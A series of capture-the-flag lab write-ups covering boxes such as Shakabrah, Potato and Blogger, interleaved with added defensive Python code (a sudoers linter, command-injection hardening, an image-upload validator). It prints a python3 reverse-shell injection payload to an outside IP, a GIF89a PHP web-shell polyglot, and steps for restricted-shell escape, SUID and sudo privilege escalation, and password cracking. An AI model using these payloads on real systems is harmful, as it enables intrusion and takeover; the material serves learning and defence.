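        if not m:
            continue
        tags = [t for t in m.group("tags").replace(" ", "").split(":") if t]
        for cmd in m.group("cmds").split(","):
            if cmd.strip():
                rules.append({"runas": m.group("runas").strip(), "tags": tags, "command": cmd.strip()})
    return rules


def assess(rule: Dict) -> List[str]:
    """Reasons a rule is dangerous when it runs as root; empty if nothing obvious."""
    runas = rule["runas"].split(":")[0].strip()      # "(root)" or "(ALL : ALL)"
    if runas not in ("root", "ALL"):
        return []
    if rule["command"] == "ALL":
        return ["unrestricted ALL as root"]
    argv = rule["command"].split()
    prog = posixpath.basename(argv[0])
    reasons = []
    if prog in LAUNCHERS:
        reasons.append(f"{prog} is an interpreter or launcher (rule is only as safe as its arguments)")
    if any("*" in a or "?" in a for a in argv[1:]):
        reasons.append("wildcard in arguments lets the caller choose the path")
    if reasons and "NOPASSWD" in rule["tags"]:
        reasons.append("NOPASSWD: no authentication required")
    return reasons


def lint(text: str) -> List[Tuple[str, List[str]]]:
    """(command, reasons) for every flagged rule in a sudo -l dump."""
    return [(r["command"], assess(r)) for r in parse_sudo_l(text) if assess(r)]


if __name__ == "__main__":
    for cmd, reasons in lint(SAMPLE):
        print(cmd, "->", "; ".join(reasons))
```

For the python2 rule the fix is not in sudoers alone: the script must stop calling exec() on input, must be root-owned and non-writable, and the rule should name a fixed, argument-free command. Wildcards belong nowhere in a sudoers command spec.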

SunsetDecoy

Port scan result: 22 and 80 open.

The website serves a zip file. After downloading it, the zip turns out to be password-protected; zip2john followed by john cracks the password: manuel. Unzipping it yields passwd, shadow and so on.
image

┌──(kali㉿LAPTOP-FKRJU4AD)-[/tmp/etc]
└─$ ll
total 24
-rw-r--r-- 1 kali kali  829 Jun 28  2020 group
-rw-r--r-- 1 kali kali   33 Jun 28  2020 hostname
-rw-r--r-- 1 kali kali  185 Jun 28  2020 hosts
-rw-r--r-- 1 kali kali 1807 Jun 28  2020 passwd
-rw-r----- 1 kali kali 1111 Jul  8  2020 shadow
-r--r----- 1 kali kali  669 Feb  2  2020 sudoers                                                  

┌──(kali㉿LAPTOP-FKRJU4AD)-[/tmp/etc]
└─$ unshadow passwd shadow > hash       

unshadow plus john cracks the user 296640a3b825115a47b68fc44501c828 with password server, and SSH login succeeds.
image

296640a3b825115a47b68fc44501c828@60832e9f188106ec5bcc4eb7709ce592:~$ ls -al
total 56
drwxr-xr-x 2 296640a3b825115a47b68fc44501c828 296640a3b825115a47b68fc44501c828  4096 Aug 21 10:41 .
drwxr-xr-x 3 root                             root                              4096 Jun 27  2020 ..
lrwxrwxrwx 1 root                             root                                 9 Jul  7  2020 .bash_history -> /dev/null
-rw-r--r-- 1 296640a3b825115a47b68fc44501c828 296640a3b825115a47b68fc44501c828   220 Jun 27  2020 .bash_logout
-rw-r--r-- 1 296640a3b825115a47b68fc44501c828 296640a3b825115a47b68fc44501c828  3583 Jun 27  2020 .bashrc
-rwxr-xr-x 1 root                             root                             17480 Jul  7  2020 honeypot.decoy
-rw------- 1 root                             root                              1855 Jul  7  2020 honeypot.decoy.cpp
lrwxrwxrwx 1 root                             root                                 7 Jun 27  2020 id -> /bin/id
lrwxrwxrwx 1 root                             root                                13 Jun 27  2020 ifconfig -> /bin/ifconfig
-rw-r--r-- 1 296640a3b825115a47b68fc44501c828 296640a3b825115a47b68fc44501c828    33 Aug 21 09:57 local.txt
lrwxrwxrwx 1 root                             root                                 7 Jun 27  2020 ls -> /bin/ls
lrwxrwxrwx 1 root                             root                                10 Jun 27  2020 mkdir -> /bin/mkdir
-rwxr-xr-x 1 root                             root                               807 Jun 27  2020 .profile
-rw-r--r-- 1 296640a3b825115a47b68fc44501c828 296640a3b825115a47b68fc44501c828    66 Jun 27  2020 .selected_editor
-rwxrwxrwx 1 296640a3b825115a47b68fc44501c828 296640a3b825115a47b68fc44501c828    32 Aug 27  2020 user.txt

This is a very restricted shell, so the box is testing restricted shell escaping. Running honeypot.decoy and choosing option 7 opens vim.

296640a3b825115a47b68fc44501c828@60832e9f188106ec5bcc4eb7709ce592:~$ honeypot.decoy
--------------------------------------------------

Welcome to the Honey Pot administration manager (HPAM). Please select an option.
1 Date.
2 Calendar.
3 Shutdown.
4 Reboot.
5 Launch an AV Scan.
6 Check /etc/passwd.
7 Leave a note.
8 Check all services status.

Option selected:7      

I looked up vim editor commands and found :r local.txt, which reads local.txt successfully.
Then I asked ChatGPT, which listed several ways to escape the restriction:

Use a relative path or only the command name:
ssh user@ip -t sh

Run a non-interactive command:
ssh user@ip 'sh -c "your command"'

Try starting another, unrestricted shell:
ssh user@ip -t bash

Escape via rbash:
ssh user@ip -t "bash --noprofile"

Here -t sh gives an unrestricted shell, but I saw a better solution: inside the restricted environment, just add the standard directories to PATH:

export PATH=$PATH:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin

Damn, still couldn't get root; shelving this one.

OnSystemShellDredd

Scanning the 20 most common ports first, only port 21 is open, and anonymous login works.
image
After connecting with ftp, ls shows nothing; poking around, the files turn out to be dotfiles (names starting with .).
image
I downloaded id_rsa. Since the scan so far showed no SSH service, I rescanned all ports with -p-.
image
SSH in, and the user flag is obtained.
image
After trying a few methods, searching for SUID binaries and checking GTFOBins showed that mawk is exploitable.
image
Finally got the root flag.
image

Shakabrah

No port scan this time; from experience 22 and 80 are open and I was too lazy to scan. The web page practically tells me to do command injection, and that gives the user flag.
image
Then I spent about an hour trying to get a reverse shell without success, so I peeked at someone else's working reverse shell payload:

; python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.45.208",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("bash")'

After catching it locally, first upgrade to a fully usable shell:

python3 -c 'import pty; pty.spawn("/bin/bash")'

find / -perm -u=s 2>/dev/null shows that vim is SUID, so vim /root/proof.txt directly gives the root flag. The vim here is very quirky; after a lot of back and forth I finally saw the flag on a strange-looking screen.
image
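The page that "tells you to do command injection" is the classic pattern of splicing a form value into a shell command string; the `;` that opens the payload above only works because the input reaches a shell. The added example below is not the box's code (the writeup does not show its source, so a ping-style form is assumed): it puts the injectable pattern beside the hardened form, which validates the target as an IP literal or RFC 1123 hostname and then executes an argv list with no shell at all. The payload strings in the checks are constructed.

```python
"""Command injection: the vulnerable pattern beside a hardened form.

Added example for the Shakabrah writeup; the box's page source is not shown, so a
ping form is assumed. Nothing is executed until validation has passed.
"""
import ipaddress
import re
import subprocess
from typing import List

# RFC 1123 hostname: labels of 1-63 alnum/hyphen chars, no leading/trailing hyphen.
HOSTNAME_RE = re.compile(
    r"^(?=.{1,253}$)(?!-)[A-Za-z0-9-]{1,63}(?<!-)(\.(?!-)[A-Za-z0-9-]{1,63}(?<!-))*$"
)


def vulnerable_command(user_input: str) -> str:
    """What an injectable page effectively builds: the input is concatenated into a
    shell string (later run with shell=True), so '; ...' becomes a second command.
    Shown only to make the flaw visible; this string is never executed here."""
    return "ping -c 1 " + user_input


def validate_target(user_input: str) -> str:
    """Accept an IPv4/IPv6 literal or a hostname; reject everything else."""
    s = user_input.strip()
    try:
        return str(ipaddress.ip_address(s))
    except ValueError:
        pass
    if HOSTNAME_RE.match(s):
        return s
    raise ValueError(f"invalid target: {user_input!r}")


def safe_argv(user_input: str) -> List[str]:
    """Build the argument vector without a shell. Because the target has been
    validated, it cannot contain separators, quotes or a leading '-' option."""
    return ["ping", "-c", "1", validate_target(user_input)]


def run_ping(user_input: str) -> str:
    """Execute the hardened form (list argv, shell=False, bounded runtime)."""
    result = subprocess.run(safe_argv(user_input), capture_output=True, text=True, timeout=10)
    return result.stdout


def is_rejected(user_input: str) -> bool:
    """True if validate_target refuses the input (convenience for checks)."""
    try:
        validate_target(user_input)
    except ValueError:
        return True
    return False


if __name__ == "__main__":
    # Constructed payload: note how the vulnerable string grows a second command.
    print(vulnerable_command("127.0.0.1; id"))
    print(safe_argv("127.0.0.1"))
    print("rejected" if is_rejected("127.0.0.1; id") else "accepted")
```

Validation is the first line of defence, but the shell-free argv list is what actually removes the injection class: even if the allowlist were wrong, a list argument is passed to execve() as a single token and is never parsed for `;`, `|`, `$()` or backticks.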

InfosecPrep

Port scan result: 22 and 80 open.

The nmap NSE scan found robots.txt, which disallows /secret. That page is a big blob of base64; decoding it gives an OpenSSH private key. Save it as id_rsa, chmod 600, SSH in, and the user flag is obtained.
image
Then I spent two or three hours on SUID privilege escalation, trying every method. Digging into uname -r turned up a kernel CVE that matched, but the box has no gcc, so I compiled locally and served the binary over a web server; the target environment didn't support it and it errored out, and none of the GitHub exploits worked either. After a really long time I peeked at how others did it and found that simply running bash -p escalates to root.
image

Potato

Scan common ports first.
image
Port 80 is open, so start with the web; the page is just a potato.
image
dirb enumerates URIs and finds /admin.
image
SQL injection didn't work, so keep scanning; /admin/logs/ reveals that there is a user admin.
image
Out of ideas, I ran a full port scan and found port 2112 open; a detailed scan of it shows FTP with anonymous login allowed.
image
cat index.php.bak gives the site's code:

<?php

$pass= "potato"; //note Change this password regularly

if($_GET['login']==="1"){
  if (strcmp($_POST['username'], "admin") == 0  && strcmp($_POST['password'], $pass) == 0) { // no type check: strcmp() returns NULL for an array argument (PHP 7), and NULL == 0 is true
    echo "Welcome! </br> Go to the <a href=\"dashboard.php\">dashboard</a>";
    setcookie('pass', $pass, time() + 365*24*3600);
  }else{
    echo "<p>Bad login/password! </br> Return to the <a href=\"index.php\">login page</a> <p>";
  }
  exit();
}
?>

But admin/potato does not log in.
Looking up PHP strcmp bypasses, I followed this article:
image
After logging in, the logs page looks command-injectable when tested with Burp Suite.
image
A few injection attempts later, the user flag is obtained.
image
Then cat /etc/passwd gives webadmin's password hash.
image
I fed it to john, but my john stopped responding, so hashcat found the password instead: dragon.
image
Then sudo -l to see what is usable: there is this odd rule, /bin/nice /notes/*. Forcing it to run /bin/sh, OK, got root.
image

FunboxEasy

Port scan result:
image
dirb finds /store/, which is a bookstore app with a known RCE; don't ask how I know (I've hit it before).
image
The payload from Exploit-DB gets in. After grabbing the user flag, I also collected the password for SSH access along the way.
image
Finally sudo -l: the first entry failed, so from experience I picked another one to try and got root.
image

Moneybox

How to put it, this one is very CTF-like; I've done similar ones before.

Port scan result: 21, 22 and 80 open.
FTP allows anonymous login; inside there is just one image. Download it and run
steghide extract -sf trytofind.jpg
It needs a password. dirb finds /blog, and from there it's F12 all the way (the kind anyone with hands can do); that gives the key. Extracting with it yields data.txt as follows:
image
It mentions the name renu and says the password is too weak, and there is nothing else to attack, so hydra it is. After logging in I looked around and tried all sorts of privilege escalation methods without finding anything usable. Then I found an authorized_keys file and, not knowing what it does, asked ChatGPT:

The authorized_keys file lives in the .ssh directory and stores the public keys allowed to log in over SSH. When you connect to the server over SSH, the server checks whether the private key you present corresponds to a public key in authorized_keys; if it matches, you are allowed in.

After SSHing in as the other user, the SUID search shows nothing, but sudo -l shows something exploitable, and that gives root.
image

Gaara

A full port scan shows only 22 and 80. The web page is a single image, nothing else, and dirb finds nothing useful. With
/usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt it only hits near the end of the list: /Cryoserver, which opens as a blank page.
image
I first thought it was a dead page and kept brute-forcing; the list above turned up nothing, so I came back, looked carefully, and found content at the very bottom.
image
Then into one of the directories.
image
In short, the name Gaara is obtained, and hydra brute-forces the SSH login.
image
User flag obtained directly, nothing more to say. For the root flag, search for SUID binaries, and GTFOBins shows gdb is exploitable.
image

Blogger

Port scan result:

┌─[root@G]─[/home/parrot]
└──╼ #nmap -sS -Pn -sC 192.168.165.217 --top-ports=20
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-08-01 14:02 CST
Nmap scan report for blogger.pg (192.168.165.217)
Host is up (0.071s latency).

PORT     STATE  SERVICE
21/tcp   closed ftp
22/tcp   open   ssh
| ssh-hostkey:
|   2048 95:1d:82:8f:5e:de:9a:00:a8:07:39:bd:ac:ad:d3:44 (RSA)
|   256 d7:b4:52:a2:c8:fa:b7:0e:d1:a8:d0:70:cd:6b:36:90 (ECDSA)
|_  256 df:f2:4f:77:33:44:d5:93:d7:79:17:45:5a:a1:36:8b (ED25519)
23/tcp   closed telnet
25/tcp   closed smtp
53/tcp   closed domain
80/tcp   open   http
|_http-title: Blogger | Home
110/tcp  closed pop3
111/tcp  closed rpcbind
135/tcp  closed msrpc
139/tcp  closed netbios-ssn
143/tcp  closed imap
443/tcp  closed https
445/tcp  closed microsoft-ds
993/tcp  closed imaps
995/tcp  closed pop3s
1723/tcp closed pptp
3306/tcp closed mysql
3389/tcp closed ms-wbt-server
5900/tcp closed vnc

22 and 80 open.
The web page has nothing substantial; it's all front end.
image
dirb finds /assets/, which allows directory traversal (the directory is browsable); looking around leads to assets/fonts/blog/. Opening any post there, there is an upload form at the bottom. Uploading a php_reverse_shell renamed to an image filename was still filtered, so I changed the file contents to start with GIF89a; the upload then succeeded and gave RCE. After that, run:

python3 -c 'import pty; pty.spawn("/bin/bash")'
You must use /bin/bash here to get full terminal functionality; /bin/sh doesn't give it.
This makes the shell comfortable to work in.

image
image
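The Blogger filter was defeated because it accepted the first bytes of the file as proof it was an image: a GIF89a header followed by PHP passes a magic-byte check and is still executed if it lands somewhere the web server runs PHP. The added example below is not the site's code; it shows what a stricter upload validator looks like: extension allowlist, magic bytes that match the claimed extension, no script tags anywhere in the body, a size cap, and a random storage name so the client never controls the path. Limits and names are assumptions; the sample uploads are constructed.

```python
"""Validate an image upload more strictly than a magic-bytes check.

Added example for the Blogger writeup; not the site's code. MAX_BYTES and the
allowlist are assumptions. Sample uploads below are constructed.
"""
import os
import re
import secrets
from typing import List, Tuple

# Extension allowlist mapped to the magic bytes each must start with.
MAGIC = {
    ".gif": (b"GIF87a", b"GIF89a"),
    ".png": (b"\x89PNG\r\n\x1a\n",),
    ".jpg": (b"\xff\xd8\xff",),
    ".jpeg": (b"\xff\xd8\xff",),
}
# Server-side script markers that have no business inside an image body.
SCRIPT_RE = re.compile(rb"<\?(?:php\b|=)|<script\b|<%", re.IGNORECASE)
MAX_BYTES = 2 * 1024 * 1024  # assumed limit

# Constructed samples: a minimal GIF header, and the GIF89a+PHP polyglot the writeup used.
GOOD_GIF = b"GIF89a" + b"\x01\x00\x01\x00\x80\x00\x00" + b"\x00" * 8 + b";"
POLYGLOT = b"GIF89a" + b"<?php echo system($_GET['cmd']); ?>"


def validate_upload(filename: str, data: bytes) -> Tuple[bool, List[str], str]:
    """Return (accepted, reasons, safe_name).

    safe_name is a random token plus the validated extension; the client-supplied
    name is used for nothing but the extension check."""
    reasons: List[str] = []
    base = os.path.basename(filename)
    if base != filename or ".." in base:
        reasons.append("path components in filename")
    if base.count(".") > 1:
        reasons.append("double extension")          # shell.php.gif and friends
    ext = os.path.splitext(base)[1].lower()
    if ext not in MAGIC:
        reasons.append(f"extension not allowed: {ext or '(none)'}")
    elif not data.startswith(MAGIC[ext]):
        reasons.append("magic bytes do not match extension")
    if len(data) > MAX_BYTES:
        reasons.append("too large")
    if SCRIPT_RE.search(data):
        reasons.append("script tag inside image data")
    safe_name = secrets.token_hex(16) + ext if not reasons else ""
    return (not reasons, reasons, safe_name)


if __name__ == "__main__":
    for name, blob in (("avatar.gif", GOOD_GIF), ("shell.gif", POLYGLOT),
                       ("php_reverse_shell.php", POLYGLOT)):
        ok, why, stored = validate_upload(name, blob)
        print(name, "accepted as", stored if ok else "rejected: " + "; ".join(why))
```

Validation alone is still a race against the next polyglot, so the storage side matters as much: write uploads outside the document root (or into a directory where PHP execution is disabled, e.g. php_admin_flag engine off in the Apache vhost), serve them through a handler that sets Content-Type from the validated extension, and never let the stored name come from the request.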
Many privilege escalation methods failed, so I started by switching to ordinary users; switching to vagrant with the password vagrant finally worked, and as vagrant, sudo su gives root.
image

CyberSploit1

80 and 22 open.
The page source (F12) has a comment at the bottom giving a username; then decode the base64 from robots.txt:
image

┌──(kali㉿G)-[~]
└─$ echo "Y3liZXJzcGxvaXR7eW91dHViZS5jb20vYy9jeWJlcnNwbG9pdH0=" | base64 -d
cybersploit{youtube.com/c/cybersploit}

That gives a flag. Brute-forcing SSH with rockyou failed, but using this flag as the password logs in.
image
Then the Linux kernel version turns out to be exploitable: uname -r shows 3.13.0, and searchsploit finds a usable exploit.
image

Ha-natraj

Recommended box; I learned something useful here.

22 and 80 open.

The website has no obvious entry point. Brute-forcing directories finds /console, which contains file.php; fuzzing shows that appending a ?file= parameter gives an LFI. Web log poisoning to RCE failed, but using the log of the SSH service on port 22 worked for RCE.
image
image
Privilege escalation here has two stages. First, after the usual checks, sudo -l shows apache2 can be used; check the apache2 config file,

(Shelved for now; still couldn't get root.)

Sar

22 and 80 open.

At first the site had nothing. Brute-forcing directories, robots.txt points to sar2HTML; looking at it, the site shows its version, and Exploit-DB has an RCE for it. Using that exploit got RCE; then I started a web server on the attacker side and had the victim download a PHP reverse shell.
image
image
Finally, abuse crontab. Adding a line with /bin/bash -i directly didn't work, so I reused the existing PHP reverse shell to get another callback.
image

SunsetNoontide

┌──(root㉿G)-[/tmp]
└─# nmap 192.168.151.120 -Pn -sS -T5 -p-
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-09-14 22:51 CST
Warning: 192.168.151.120 giving up on port because retransmission cap hit (2).
Nmap scan report for 192.168.151.120
Host is up (0.084s latency).
Not shown: 65034 closed tcp ports (reset), 498 filtered tcp ports (no-response)
PORT     STATE SERVICE
6667/tcp open  irc
6697/tcp open  ircs-u
8067/tcp open  infi-async

Nmap done: 1 IP address (1 host up) scanned in 718.43 seconds

This box is unusual; after some research, this turns out to be a backdoor.